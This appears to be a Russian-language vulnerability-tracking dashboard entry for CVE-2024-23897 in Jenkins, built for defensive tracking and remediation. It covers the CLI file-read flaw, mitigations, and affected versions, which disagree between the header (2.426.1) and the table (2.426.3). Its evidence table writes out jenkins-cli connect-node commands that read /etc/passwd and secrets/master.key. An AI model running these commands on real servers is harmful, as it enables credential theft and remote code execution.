Тема: светлая
ID: CVE-2024-23897 Алиасы: Jenkins SECURITY-3314 critical CVSS: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) EPSS: 0.93 KEV: Да (01.02.2024) БДУ: — ICS/КИИ: Нет

CVE-2024-23897 — чтение произвольных файлов и RCE через Jenkins CLI

Jenkins до 2.441 LTS / 2.426.1 • Опубликовано: 24.01.2024 • Обновлено: 20.02.2024
Открыть в NVD Advisory Jenkins Назад на дашборд

Краткое описание

Ошибка в обработке аргументов CLI-команды connect-node позволяет удалённому неаутентифицированному пользователю читать произвольные файлы на мастер-узле Jenkins. Используя чтение secrets/master.key и secrets/hudson.util.Secret, атакующий может выполнить десериализацию конфигураций и добиться удалённого выполнения кода.

Рекомендации

Jenkins: Manage Jenkins → Configure Global Security → Disable CLI
Groovy: println(Jenkins.instance.isCliDisabled())

Интеграции

Подставьте значения вашей организации вместо плейсхолдеров JIRA_* / SN_* / SIEM_*.
Примечание: интеграционные кнопки скрываются при печати.

Доказательства обнаружения

ХостКомандаРезультатПервое/последнее замечено
jenkins-core01.internal java -jar jenkins-cli.jar -s https://jenkins.example.com/ connect-node @/etc/passwd /etc/passwd content leaked (root:x:0:0:...) 2024-01-29 → 2024-02-01
jenkins-core02.internal java -jar jenkins-cli.jar -s https://jenkins.example.com/ connect-node @/var/lib/jenkins/secrets/master.key master.key exfiltrated 2024-02-02 → 2024-02-02

Затронутые продукты

Продукт (CPE)Диапазон версийКомпонент
cpe:2.3:a:jenkins:jenkins:2.441< 2.441CLI
cpe:2.3:a:jenkins:jenkins_lts:2.426.3< 2.426.3CLI

Ссылки

Теги

JenkinsRCEKEVCriticalCI/CD